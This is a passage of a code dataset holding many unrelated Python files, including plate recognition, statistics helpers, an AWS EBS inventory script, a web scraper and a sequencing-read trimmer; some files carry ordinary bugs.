cv2.waitKey()\n            count += 1\n            '''侦测网络、字符变量、字符识别网络、图片、样本尺寸、阈��、车牌高宽(48,144)、使用定向搜索,定向尺寸、设备'''\n            results = read_plate(image)\n            for plate, box in results:\n                print(yes,yesss,count,yes/count,yesss/count,label,plate)\n                if label == plate:\n                    yes+=1\n                if label[1:]==plate[1:]:\n                    yesss+=1\n                image = cv2.rectangle(image, (int(box[0]), int(box[1])), (int(box[2]), int(box[3])), (0, 0, 255), 2)\n                image = DrawChinese(image, plate, (int(box[0]), int(box[1])-50), 40,(200,0,0))\n                cv2.imshow('a',image)\n                cv2.waitKey(0)\n                break\n            break\n    print(yes,count,yes/count)\n\n\nif __name__ == \"__main__\":\n    import os\n\n    images = []\n    for file_name in os.listdir('/home/cq/public/hibiki/CCPD2019/test'):\n        # for image_name in os.listdir(f'/home/cq/public/hibiki/CCPD2019/ccpd_db/{file_name}'):\n        images.append(f'/home/cq/public/hibiki/CCPD2019/test/{file_name}')\n    test(images)\n","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"149758313","text":"from statistics import variance\nfrom typing import List\nimport math\ndef zcount(list: List[float]) -> float:\n    return len(list)\n    #print(\"stat test\")\n    #print(\"zcount should 5==\"), zcount ([1.0,2.0,3.0,4.0,5.0]) \n\ndef zmean(list: List[float]) -> float:\n    return sum(list) / zcount(list)\n    \ndef zmode(list: List[float]) -> float:\n    return max(set(list) , key = list.count)\n    \ndef zmedian(list: List[float]) -> float:\n    sortedlst = sorted(list)\n    lstlen = len(list)\n    index = (lstlen - 1) //2\n    if(lstlen %2):\n        return sortedlst[index]\n    else:\n        return (sortedlst[index] + sortedlst[index +1])/2.0\n\ndef zvariance(list: List[float]) -> float:\n    n = zcount(list) - 1\n    mean = zmean(list)\n    deviation = [abs(mean - xi) ** 2 for xi in list]\n    variance = sum(deviation) / n\n\n\ndef zstddev(list: List[float]) -> float:\n\n    var = zvariance(list)\n\n    return math.sqrt(var)\n\n\ndef zstderr(list: List[float]) -> float:\n\n    sd = zstddev(list)\n    n = zcount(list)\n\n    return sd / math.sqrt(n)\n\n\ndef zcov(listx: List[float], listy: List[float]) -> float:\n\n    n = zcount(listx)\n    sum_of_product = 0\n    counter = 0\n\n    while counter < len(listx):\n        product = listx[counter] * listy[counter]\n        sum_of_product += product\n        counter += 1\n\n    sums = (sum(listx) * sum(listy)) / n\n\n    cov = (sum_of_product - sums) / (n - 1)\n    return cov\n\n\ndef zcorr(listx: List[float], listy: List[float]) -> float:\n\n    cov = zcov(listx, listy)\n    sx = zstddev(listx)\n    sy = zstddev(listy)\n\n    return (cov) / (sx * sy)\n\ndef readDataSet(files):\n#    print(\"in readDataSets...\", files)\n    data = {}\n    for file in files:\n        twoLists = readDataSet(file)\n        data[file] = twoLists    \n    return data\n\ndef readDataFile(fname):\n    x,y =  ([],[])\n    with open(file) as f:\n        first_line = f.readline() #consume headers\n        for l in f:\n            row = l.split(',')\n            print(row, type (row))\n            x.append(float(row[0]))\n            y.append(float(row[1]))\n        return (x,y)","sub_path":"statzcw/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"53139002","text":"\ndef main():\n    import os\n    OMP_NUM_THREADS = '1'\n    OPENBLAS_NUM_THREADS = '1'\n    MKL_NUM_THREADS = '1'\n    os.environ[\"OMP_NUM_THREADS\"] = OMP_NUM_THREADS  # export OMP_NUM_THREADS=4\n    os.environ[\"OPENBLAS_NUM_THREADS\"] = OPENBLAS_NUM_THREADS  # export OPENBLAS_NUM_THREADS=4\n    os.environ[\"MKL_NUM_THREADS\"] = MKL_NUM_THREADS  # export MKL_NUM_THREADS=6\n\n    import json\n    import zarr\n    import dask.array as da\n    from dask.distributed import Client\n    import time\n    import traceback\n\n    from lmdec.decomp import PowerMethod\n\n    data_directory = '/nfs/pool002/users/tnonet/SNP_Zarr'\n    #data_directory = '/Users/tnonet/Documents/SNP_matrices'\n    matrix = '160K_640K'\n    matrix_path = os.path.join(data_directory, matrix + '.zarr')\n    json_file_path = '_'.join(['March1', 'PM_test', matrix]) + '.json'\n\n    assert os.path.isdir(matrix_path)\n\n    assert not os.path.isfile(json_file_path)\n\n    logs = dict()\n    k = 10\n    max_iterations = 200\n    time_limit = 6400\n    buffer = 10\n    tol = 1e-6\n    num_runs = 1\n    p = 1\n    worker_list = [2, 4, 8]\n    memory_list = ['50GB', '100GB', '200GB']\n    score = 'rmse'\n    logs['k'] = k\n    logs['p'] = p\n    logs['num_runs'] = num_runs\n    logs['max_iterations'] = max_iterations\n    logs['scoring'] = score\n    logs['b'] = buffer\n    logs['time_limit'] = time_limit\n    logs['tol'] = tol\n    logs['date'] = time.time()\n    logs['worker'] = worker_list\n    logs['memory'] = memory_list\n    try:\n        root = zarr.open(matrix_path, mode='r')\n        array = da.from_zarr(root)\n        for run in range(num_runs):\n            for work in worker_list:\n                for mem in memory_list:\n                    client = Client(n_workers=work,\n                                    threads_per_worker=1,\n                                    memory_limit=mem)\n                    PM = PowerMethod(max_iter=max_iterations,\n                                     k=k,\n                                     buffer=buffer,\n                                     p=p,\n                                     tol=tol,\n                                     scoring_method=score,\n                                     time_limit=time_limit,\n                                     track_metrics=True)\n                    _, _, _ = PM.svd(array)\n                    client.close()\n                    logs[str((work, mem, run))] = [str(PM.metrics), str(PM.time), str(PM.times)]\n\n                    with open(json_file_path, 'w', encoding='utf-8') as f:\n                        json.dump(logs, f, ensure_ascii=False, indent=4)\n\n\n    except Exception:\n        traceback.print_exc()\n        with open(json_file_path, 'w', encoding='utf-8') as f:\n            json.dump(logs, f, ensure_ascii=False, indent=4)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"matrix_test_MARCH1.py","file_name":"matrix_test_MARCH1.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"396397564","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nmodel = keras.models.load_model('1/9.hdf5')\n\n_img = keras.preprocessing.image.load_img(\n    'train/train/00013.jpg',\n    grayscale=True,\n    target_size=(48, 48))\n\n# preprocess image to get it into the right format for the model\nimg = keras.preprocessing.image.img_to_array(_img)\nimg = img.reshape((1, *img.shape))\ny_pred = model.predict(img)\n\nimages = tf.Variable(img, dtype=float)\n\nwith tf.GradientTape() as tape:\n    pred = model(images, training=False)\n    class_idxs_sorted = np.argsort(pred.numpy().flatten())[::-1]\n    loss = pred[0][class_idxs_sorted[0]]\n\ngrads = tape.gradient(loss, images)\ndgrad_abs = tf.math.abs(grads)\ndgrad_max_ = np.max(dgrad_abs, axis=3)[0]\n\n# normalize to range between 0 and 1\narr_min, arr_max  = np.min(dgrad_max_), np.max(dgrad_max_)\ngrad_eval = (dgrad_max_ - arr_min) / (arr_max - arr_min + 1e-18)\n\nfig, axes = plt.subplots(1,2,figsize=(14,5))\naxes[0].imshow(_img, cmap='gray')\ni = axes[1].imshow(grad_eval, cmap=\"jet\",alpha=0.8)\nfig.colorbar(i)\nplt.show()\n\n# # Find the index of the to be visualized layer above\n# layer_index = utils.find_layer_idx(model, 'dense_2')\n#\n# # Swap softmax with linear\n# model.layers[layer_index].activation = keras.activations.linear\n# model = utils.apply_modifications(model)\n#\n# # Numbers to visualize\n# indices_to_visualize = [ 0, 12, 38, 83, 112, 74, 190 ]\n#\n# # Visualize\n# for index_to_visualize in indices_to_visualize:\n#   # Get input\n#   input_image = input_test[index_to_visualize]\n#   # Class object\n#   classes = {\n#     0: 'airplane',\n#     1: 'automobile',\n#     2: 'bird',\n#     3: 'cat',\n#     4: 'deer',\n#     5: 'dog',\n#     6: 'frog',\n#     7: 'horse',\n#     8: 'ship',\n#     9: 'truck'\n#   }\n#   input_class = np.argmax(target_test[index_to_visualize])\n#   input_class_name = classes[input_class]\n#   # Matplotlib preparations\n#   fig, axes = plt.subplots(1, 2)\n#   # Generate visualization\n#   visualization = visualize_saliency(model, layer_index, filter_indices=input_class, seed_input=input_image)\n#   axes[0].imshow(input_image)\n#   axes[0].set_title('Original image')\n#   axes[1].imshow(visualization)\n#   axes[1].set_title('Saliency map')\n#   fig.suptitle(f'CIFAR10 target = {input_class_name}')\n#   plt.show()\n\n\n# Reference:\n# https://usmanr149.github.io/urmlblog/cnn/2020/05/01/Salincy-Maps.html","sub_path":"hw3/saliency.py","file_name":"saliency.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"242668700","text":"from update_model4 import horse_trend\r\nfrom db.db import singleton_ResultsDb\r\n\r\n\r\ndef updateData(race_results_rows, immd_rows, today_race_start_time, cur_row, update_table, race_No, horse_No):\r\n    # odd_trend\r\n    horse_code = cur_row['horse_code']\r\n    win_odds = float(cur_row['win_odds'])\r\n    odd_trend = horse_trend.getOddsTrend(horse_code, win_odds, race_results_rows)\r\n\r\n    # odd_wave\r\n    race_date = cur_row['race_date']\r\n    odd_wave = horse_trend.getOddsWave(race_date, race_No, horse_No, win_odds, today_race_start_time, immd_rows)\r\n\r\n    sql_update = '''update {} set odd_trend=%s, odd_wave=%s where race_date=%s and race_no=%s and horse_no=%s'''.format(update_table)\r\n    cur_data = (odd_trend, odd_wave, race_date, race_No, horse_No)\r\n    singleton_ResultsDb.cursor.execute(sql_update, cur_data)\r\n\r\n\r\n","sub_path":"20190521/update_immd_model4/update_model4/update_data_win_odds.py","file_name":"update_data_win_odds.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"145736416","text":"# Count the number of prime numbers less than\n# 2 million and time how long it takes\n# Compares the performance of two different\n# algorithms.\nfrom time import clock\nfrom math import sqrt\ndef count_primes(n):\n    '''\n    Generates all the prime numbers from 2 to n - 1.\n    n - 1 is the largest potential prime considered.\n    '''\n    start = clock() # Record start time\n    count = 0\n    for val in range(2, n):\n        result = True # Provisionally, n is prime\n        root = int(sqrt(val) + 1)\n        # Try all potential factors from 2 to the square root of n\n        trial_factor = 2\n        while result and trial_factor <= root:\n            result = (val % trial_factor != 0 ) # Is it a factor?\n            trial_factor += 1 # Try next candidate\n        if result:\n            count += 1\n    stop = clock() # Stop the clock\n    print(\"Count =\", count, \"Elapsed time:\", stop - start, \"seconds\")\ndef seive(n):\n    '''\n    Generates all the prime numbers from 2 to n - 1.\n     n - 1 is the largest potential prime considered.\n    Algorithm originally developed by Eratosthenes.\n    '''\n    start = clock() # Record start time\n    # Each position in the Boolean list indicates\n    # if the number of that position is not prime:\n    # false means \"prime,\" and true means \"composite.\"\n    # Initially all numbers are prime until proven otherwise\n    nonprimes = n * [False] # Global list initialized to all False\n    count = 0\n    # First prime number is 2; 0 and 1 are not prime\n    nonprimes[0] = nonprimes[1] = True\n    # Start at the first prime number, 2.\n    for i in range(2, n):\n        # See if i is prime\n        if not nonprimes[i]:\n            count += 1\n            # It is prime, so eliminate all of its\n            # multiples that cannot be prime\n            for j in range(2*i, n, i):\n                nonprimes[j] = True\n    # Print the elapsed time\n    stop = clock()\n    print(\"Count =\", count, \"Elapsed time:\", stop - start, \"seconds\")\ndef main():\n    count_primes(2000000)\n    seive(2000000)\nmain()\n","sub_path":"ch-9-List(md. borqat ali)/9.20.py","file_name":"9.20.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"62119514","text":"#!/bin/python\n#\n# Iterate all the instances within a specific region and identify\n# all attached EBS volumes. Record EBS volume information into\n# the 'Volume' (MySQL) database table.\n#\n#################################################################\nimport argparse\nimport boto3\nimport json\nimport subprocess\nfrom MothDBconnect import DbConnect, DbCnctInfo\n\n\n###################################################################\n# Get list of regions in service\n#    Need this for bounds-checking, but it's a Chicken/Egg problem:\n#    need AWS CLI config with default-region set\ndef ValidRegion():\n    regraw = subprocess.Popen(\n            \"aws ec2 describe-regions --query 'Regions[].RegionName[]' --out text\",\n            shell=True,\n            stdout=subprocess.PIPE).stdout.read()\n\n    return regraw.split( )\n\n#################################\n# Get list of instances in region\ndef GetInstances(args):\n\n    ec2 = session.resource(\n        'ec2',\n        region_name = args.region,\n        aws_access_key_id = args.key,\n        aws_secret_access_key = args.secret\n    )\n\n    instlist = []\n    for ret in ec2.instances.all():\n        instlist.append(ret._id)\n\n    return instlist\n\n###########################\n# Get EBS vols for instance\ndef GetEBSvolInfo(instid):\n\n    ec2 = session.resource('ec2')\n    inst = ec2.Instance(id=instid)\n    devstruct = inst.block_device_mappings\n\n    devmap = {}\n    for dev in devstruct:\n        devvolid = dev['Ebs']['VolumeId']\n        ebs = {}\n        ebs['Mount'] = dev['DeviceName']\n        ebs['Size'] = ec2.Volume(devvolid).size\n        ebs['Type'] = ec2.Volume(devvolid).volume_type\n        ebs['IOPS'] = ec2.Volume(devvolid).iops\n        ebs['AZ'] = ec2.Volume(devvolid).availability_zone\n        ebs['Tags'] = json.dumps(ec2.Volume(devvolid).tags)\n        devmap[devvolid] = ebs\n\n    return { instid : devmap }\n\n\n#################################\n# Insert EBS volume-info into SQL\ndef ebsMysql(insertData):\n    # dbconn = DbConnect(DbCnctInfo('testclt'))\n    # cursor = dbconn.cursor()\n\n    # Define INSERT-string to pass to MySQL\n    # and associated value-mapping \n    insert_struct = (\n        \"INSERT INTO Volume \"\n\t\"(\"\n\t  \"AccountId, \"\n          \"instanceId, \"\n          \"attachmentSet, \"\n          \"availabilityZone, \"\n          \"encrypted, \"\n          \"iops, \"\n          \"kmsKeyId, \"\n          \"size, \"\n          \"snapshotId, \"\n          \"status, \"\n          \"tagSet, \"\n          \"volumeId, \"\n          \"volumeType\"\n\t\") \"\n\t\"VALUES (\"\n\t  \"%(AccountId)s, \"\n          \"%(instanceId)s, \"\n          \"%(attachmentSet)s, \"\n          \"%(availabilityZone)s, \"\n          \"%(encrypted)s, \"\n          \"%(iops)s, \"\n          \"%(kmsKeyId)s, \"\n          \"%(size)s, \"\n          \"%(snapshotId)s, \"\n          \"%(status)s, \"\n          \"%(tagSet)s, \"\n          \"%(volumeId)s, \"\n          \"%(volumeType)s\"\n\t\"); \"\n    )\n\n    # Extract values from passed-EBS structure\n    instance = insertData.keys()[0]\n    for volume in insertData[instance]:\n        volMount = insertData[instance][volume]['Mount']\n        volIops = insertData[instance][volume]['IOPS']\n        if volIops is None:\n            volIops = 0\n        volType = insertData[instance][volume]['Type']\n        volSize = insertData[instance][volume]['Size']\n        volZone = insertData[instance][volume]['AZ']\n        volTags = insertData[instance][volume]['Tags']\n\n        # Define mappings to SQL-managed values\n        insert_data = {\n\t        'AccountId'\t\t: AWSaccount,\n                'instanceId'\t\t: instance,\n                'attachmentSet'\t\t: volMount,\n                'availabilityZone'\t: volZone,\n                'createTime'\t\t: '',\n                'encrypted'\t\t: '0',\n                'iops'\t\t\t: volIops,\n                'kmsKeyId'\t\t: '',\n                'size'\t\t\t: volSize,\n                'snapshotId'\t\t: '',\n                'status'\t\t: '',\n                'tagSet'\t\t: volTags,\n                'volumeId'\t\t: volume,\n                'volumeType'\t\t: volType\n\t    }\n\n        # Insert row into Volume table\n        print('Writing volume \\'%s\\' for instance \\'%s\\' to Volume table' % (volume, instance))\n        cursor.execute(insert_struct, insert_data)\n        dbconn.commit()\n\n\n############################\n# Commandline option-handler\nparseit = argparse.ArgumentParser()\n\nparseit.add_argument(\"-r\", \"--region\",\n                     choices = ValidRegion(),\n                     help=\"AWS Region\",\n                     required=True)\nparseit.add_argument(\"-k\", \"--key\",\n                     help=\"AWS access-key ID\")\nparseit.add_argument(\"-s\", \"--secret\",\n                     help=\"AWS access-key secret\")\nparseit.add_argument(\"-t\", \"--target-account\",\n                     help=\"AWS account to manage\",\n                     required=True)\n\n# Assign CLI argument-values to fetchable name-space\nargs = parseit.parse_args()\n\nAWSaccount = args.target_account\n\n# Initialize session/connection to AWS\nsession = boto3.Session(\n    region_name = args.region,\n    aws_access_key_id = args.key,\n    aws_secret_access_key = args.secret\n)\n\n# Initialize connection to MySQL\ndbconn = DbConnect(DbCnctInfo('testclt'))\ncursor = dbconn.cursor()\n\n# Create list of in-region instances to stop\nfor inst in GetInstances(args):\n    instVols = GetEBSvolInfo(inst)\n    ebsMysql(instVols)\n\n\n# Clean up connection to MySQL\ncursor.close()\ndbconn.close()\n","sub_path":"GetEBS.py","file_name":"GetEBS.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"16684615","text":"import bisect\n\ns = int(input())\nn = int(input())\n\ne = [False for i in range(0, s)]\nv = [int(input()) for i in range(0, n)]\nfor t in v:\n    if t < s:\n        e[t] = True\n\nv = sorted(v)\nz = [a + b for (a, b) in zip(v[0:n - 1], v[1:n])]\n\n\ndef solve(i):\n    r = s - v[i]\n    a = bisect.bisect_left(v, r - v[n - 1], lo=i + 1)\n    b = bisect.bisect_right(z, r, lo=a)\n    return [e[r - w] for w in v[a:b]].count(True)\n\nprint(sum([solve(i) for i in range(0, n - 2)]))\n","sub_path":"source/archives/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"569755206","text":"#kelly j 9-26-2020  learn together week 9, step 2.  setting upa virtual enviroment\n#I am gong to install into my virtual enviroment 2 libraries. beautifulsoup4 and lxml\n# so I can read a xml and print something from it.\n#I modifed code from this url  https://www.geeksforgeeks.org/reading-and-writing-xml-files-in-python/\n# to demostrate my virtual env.\n\nfrom bs4 import BeautifulSoup  \n\nwith open(\"h82sl_serviceConfig.xml\",\"r\") as myconfig:\n    myconfigData = myconfig.read()\n\n    config = BeautifulSoup(myconfigData,\"lxml\")\n\n    print(\" \")\n    theurl = config.find(\"hansen_url\")\n    thelogpath = config.find(\"hansen_logpath\")\n    print(theurl)\n    print(thelogpath)\n    # print(config.Hansen_URL)\n    # print(myconfigData)","sub_path":"w9/readaxml.py","file_name":"readaxml.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"578214217","text":"\n\nimport os, sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n# This is so Django knows where to find stuff.\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"gerenciador.settings\")\nsys.path.append(BASE_DIR)\n# This is so my local_settings.py gets loaded.\nos.chdir(BASE_DIR)\n# This is so models get loaded.\nfrom django.core.wsgi import get_wsgi_application\napplication = get_wsgi_application()\n\nfrom revisao_app.models import FlashCard, Materia\nfrom django.contrib.auth.models import User\nfrom django.contrib import admin\nfrom datetime import date, timedelta\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib.cbook as cbook\nimport json\n\ndef calculoIdade(born):\n    today = date.today()\n    return today.year - born.year - ((today.month, today.day) < (born.month, born.day))\n\ndef getDate():\n    return date.today().strftime(\"%d/%m/%Y\")\n\ndef getDateVcto():\n    data_vencimento = date.today()\n    data_vencimento = data_vencimento.replace(year=data_vencimento.year+1)\n    return data_vencimento.strftime(\"%d/%m/%Y\")\n\ndef getDateProxRevisao(n_day,dataV):\n    data_vencimento = dataV\n    data_vencimento += timedelta(days=int(n_day))\n    print(data_vencimento,\"  \",n_day)\n    return data_vencimento\n\ndef dadosGrafico(listaStor):\n    _dados = {'date':[],'peso':[]}\n    for item in listaStor:\n        _dados['peso'].append(str(item.n_peso))\n        _dados['date'].append(str(item.data_registro))\n\n    return json.dumps(_dados)\n\ndef dadosGraficoAll(listaStor):\n    _dados = {'registro':[],'peso':[]}\n\n\n    for item in listaStor:\n        _dados['peso'].append(str(item.n_peso))\n        texto = item.numero_registro+' - '+str(item.tipo_animal)\n        _dados['registro'].append(texto)\n\n    return json.dumps(_dados)\n\n\n\ndef createOptionMateria(user):\n\n    materias = Materia.objects.filter(usuario=user)\n    lista1 = []\n    for materia in materias:\n        lista1.append((materia,materia))\n\n    mytuple = tuple(lista1)\n    return mytuple\n","sub_path":"revisao_app/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"455167086","text":"from splinter import Browser\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport pandas as pd \r\n\r\n\r\ndef init_browser():\r\n    # @NOTE: Replace the path with your actual path to the chromedriver\r\n    executable_path = {'executable_path': 'chromedriver.exe'}\r\n    return Browser(\"chrome\", **executable_path, headless=False)\r\n\r\n\r\ndef scrape_info():\r\n    browser = init_browser()\r\n\r\n    # Visit visitcostarica.herokuapp.com\r\n    url = \"https://mars.nasa.gov/news/\"\r\n    browser.visit(url)\r\n\r\n    time.sleep(1)\r\n\r\n    # Scrape page into Soup\r\n    html = browser.html\r\n    soup = BeautifulSoup(html, \"html.parser\")\r\n    title = soup.find_all(\"div\", class_ = \"content_title\")\r\n    title_text = title[1].get_text()\r\n    paragraph = soup.find_all(\"div\", class_ = \"article_teaser_body\")\r\n    paragraph_text = paragraph[0].get_text()\r\n    url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\r\n    browser.visit(url)\r\n    image = browser.find_by_id(\"full_image\")\r\n    image.click()\r\n    info = browser.find_link_by_partial_text(\"more info\")\r\n    info.click()\r\n    html = browser.html\r\n    soup = BeautifulSoup(html, 'html.parser')\r\n    image = soup.select_one(\"figure.lede a img\")\r\n    src = image.get('src')\r\n    url = 'https://www.jpl.nasa.gov'\r\n    src = url + src\r\n    mars_scrape = pd.read_html(\"https://space-facts.com/mars/\")\r\n    mars_table = mars_scrape[0]\r\n    mars_html = mars_table.to_html()\r\n    url = \"https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\"\r\n    browser.visit(url)\r\n    links = browser.find_by_css(\"a.product-item h3\") \r\n    j= 0\r\n    images = []\r\n    for i in links:\r\n        browser.find_by_css(\"a.product-item h3\")[j].click()\r\n        link = browser.find_link_by_text(\"Sample\").first[\"href\"]\r\n        images.append(link)\r\n        j = j+1\r\n        browser.back()\r\n    print(src)\r\n\r\n    # Store data in a dictionary\r\n    mars_data = {\r\n        \"title\": title_text,\r\n        \"paragraph\": paragraph_text,\r\n        \"image\": src,\r\n        \"table\": mars_html,\r\n        \"images\": images\r\n    }\r\n\r\n    # Close the browser after scraping\r\n    browser.quit()\r\n\r\n    # Return results\r\n    return mars_data\r\n","sub_path":"scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"602466581","text":"import os,sys,math\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nos.chdir('C:\\\\Users\\\\Apoorva Lal\\\\Desktop\\\\Research\\\\temp')\n\nimport json\nfrom collections import defaultdict, Counter\npath = 'C:/Users/Apoorva Lal/Desktop/Research/github_forks/pydata-book/ch02/usagov_bitly_data2012-03-16-1331923249.txt'\nrecords = [json.loads(line) for line in open(path)]           \ntime_zones = [rec['tz'] for rec in records if 'tz' in rec]\ntime_zones\n\ndef get_counts(sequence):\n    counts = defaultdict(int) # values will initialize to 0\n    for x in sequence:\n        counts[x] += 1\n    return counts\n    \ncounts = get_counts(time_zones)    \n\ndef top_counts(count_dict, n=10):\n    value_key_pairs = [(count, tz) for tz, count in count_dict.items()]\n    value_key_pairs.sort()\n    return value_key_pairs[-n:]\n\ntop_counts(counts)\n\ncounts = Counter(time_zones)\ncounts.most_common(10)\n\nframe = pd.DataFrame(records)\n\nframe['tz'][:10]\ntz_counts = frame['tz'].value_counts()\n\nclean_tz = frame['tz'].fillna('Missing')\nclean_tz[clean_tz == ''] = 'Unknown'\ntz_counts = clean_tz.value_counts()\n\ntz_counts[:10].plot(kind='barh', rot=0)\n\nresults = pd.Series([x.split()[0] for x in frame.a.dropna()])\n\nresults.value_counts()[:8]\n\ncframe = frame[frame.a.notnull()]\noperating_system = np.where(cframe['a'].str.contains('Windows'),\n 'Windows', 'Not Windows')\n\noperating_system[:5]\nby_tz_os = cframe.groupby(['tz', operating_system])\nagg_counts = by_tz_os.size().unstack().fillna(0)\nagg_counts\nindexer = agg_counts.sum(1).argsort()\nindexer[:10]\n\ncount_subset = agg_counts.take(indexer)[-10:]\ncount_subset.plot(kind='barh', stacked=True)\nplt.show() \n\n\n\n\n","sub_path":"mckinney_book.py","file_name":"mckinney_book.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"164113992","text":"from __future__ import barry_as_FLUFL\n\n__all__ = ['read1', 'read2', 'trimmed1', 'un_trimmed1', 'trimmed2', 'un_trimmed2', 'min_read_len',\n           'common_seq1', 'common_seq2', 'stats_file', 'logger_trim_process', 'logger_trim_errors']\n__version__ = '1.0'\n__author__ = 'Maggie Ruimin Sun'\n\nimport logging\nimport os\nimport re\nimport sys\nimport time\nimport gzip\nimport itertools\nimport shlex\nimport subprocess\nimport numpy\n\nsys.path.append(\"..\")\nfrom pipelines.log.log_v1 import store_trim_logs\n\n\nbase_paired = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}\n#--\ndef reverse_complement(seq):\n    revseqlist = reversed(seq)\n    revcomseqlist = [base_paired[k] for k in revseqlist]\n    revcomseq = ''.join(revcomseqlist)\n    return revcomseq\n\n# put the info output to the log\ndef stdout_err(command):\n    command_pope = shlex.split(command)\n    child = subprocess.Popen(command_pope, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n    stdout, stderr = child.communicate()\n    child.wait()\n    return stdout, stderr\n\n\n# ----------------------------------------------------------\ndef read_fq(file_name, logger_trim_process, logger_trim_errors):\n    if not os.path.isfile(file_name):\n        logger_trim_errors.error(\"%s does not exist!\\n\", file_name)\n        print(file_name + ' does not exist!')\n    if re.search('.gz$', file_name):\n        fastq = gzip.open(file_name, 'r')\n    else:\n        fastq = open(file_name)\n\n    with fastq as f:\n        while True:\n            l1 = str(f.readline(), 'utf-8')\n            if not l1:\n                break\n            l2 = str(f.readline(), 'utf-8')\n            l3 = str(f.readline(), 'utf-8')\n            l4 = str(f.readline(), 'utf-8')\n            yield [l1, l2, l3, l4]\n\n\ndef trim_read1(r1, common_seq2, mt_barcode):\n    l1 = len(r1[1].strip())\n    r1_end3 = r1[1].strip()[(l1 - 23):]\n    # trim_seq = common_seq2 + mt_barcode\n    trim_seq = reverse_complement(common_seq2 + mt_barcode)\n    for i in range(23):\n        if r1_end3[i:] == trim_seq[0:(23 - i)]:\n            break\n    pos_trim_r1 = l1 - 23 + i\n    return pos_trim_r1, [r1[0], r1[1].strip()[0:pos_trim_r1] + '\\n', r1[2], r1[3].strip()[0:pos_trim_r1] + '\\n']\n\n\ndef trim_read2(r2, common_seq1):\n    l2 = len(r2[1].strip())\n    r2_end3 = r2[1].strip()[(l2 - 21):]\n    for i in range(21):\n        if r2_end3[i:] == common_seq1[0:(21 - i)]:\n            break\n    pos_trim_r2 = l2 - 21 + i\n    return pos_trim_r2, [r2[0], r2[1].strip()[0:pos_trim_r2] + '\\n', r2[2], r2[3].strip()[0:pos_trim_r2] + '\\n']\n\n\ndef trim_read_pairs(read1, read2, trimmed1, trimmed2, min_read_len, common_seq1,\n                    common_seq2, stats_file, logger_trim_process, logger_trim_errors):\n    time_start = time.time()\n    num_total_reads = 0\n    num_short_reads = 0\n    num_error_reads1 = 0\n    num_error_reads2 = 0\n    fout1 = open(trimmed1, 'w')\n    fout2 = open(trimmed2, 'w')\n    # fout_umi = open(trimmed2 + '.umi.fq', 'w')\n    for r1, r2 in zip(read_fq(read1, logger_trim_process, logger_trim_errors),\n                      read_fq(read2, logger_trim_process, logger_trim_errors)):\n        num_total_reads += 1\n        if r1[0][0] != '@' or r2[0][0] != '@':\n            num_error_reads1 += 1\n            store_trim_logs('null', logger_trim_errors,\n                            \"Error read pair: \\n\\t\" + '\\t'.join(r1) + '\\n\\t' + '\\t'.join(r2) + '\\n')\n        else:\n            start_common = r2[1].find(common_seq2)\n            if start_common < 12:\n                num_error_reads2 += 1\n                store_trim_logs('null', logger_trim_errors,\n                                \"Error barcode/common seqs:\" + str(start_common)\n                                + \"\\n\\t\" + '\\t'.join(r1) + '\\n\\t' + '\\t'.join(r2) + '\\n')\n            else:\n                umi = r2[1][(start_common - 12):start_common]\n                qua = r2[3][(start_common - 12):start_common]\n                # delete umi with low base quality \n                quanum = list(map(ord, qua))\n                quanum = [i - 33 for i in quanum]\n                # if the median base quality is bigger than Q20 \n                if numpy.median(quanum) < 20 :\n                    num_error_reads2 += 1\n                    store_trim_logs('null', logger_trim_errors,\n                                \"Error barcode/common seqs:\" + str(start_common)\n                                + \"\\n\\t\" + '\\t'.join(r1) + '\\n\\t' + '\\t'.join(r2) + '\\n')\n                else:\n                    r2[1] = r2[1][(start_common + 11):]\n                    r2[3] = r2[3][(start_common + 11):]\n                    pos_trim_r1, r1 = trim_read1(r1, common_seq2, umi)\n                    pos_trim_r2, r2 = trim_read2(r2, common_seq1)\n                    if pos_trim_r1 < min_read_len or pos_trim_r2 < min_read_len:\n                        num_short_reads += 1\n                        store_trim_logs('null', logger_trim_errors,\n                                    \"Short read pair: \\n\\t\" + 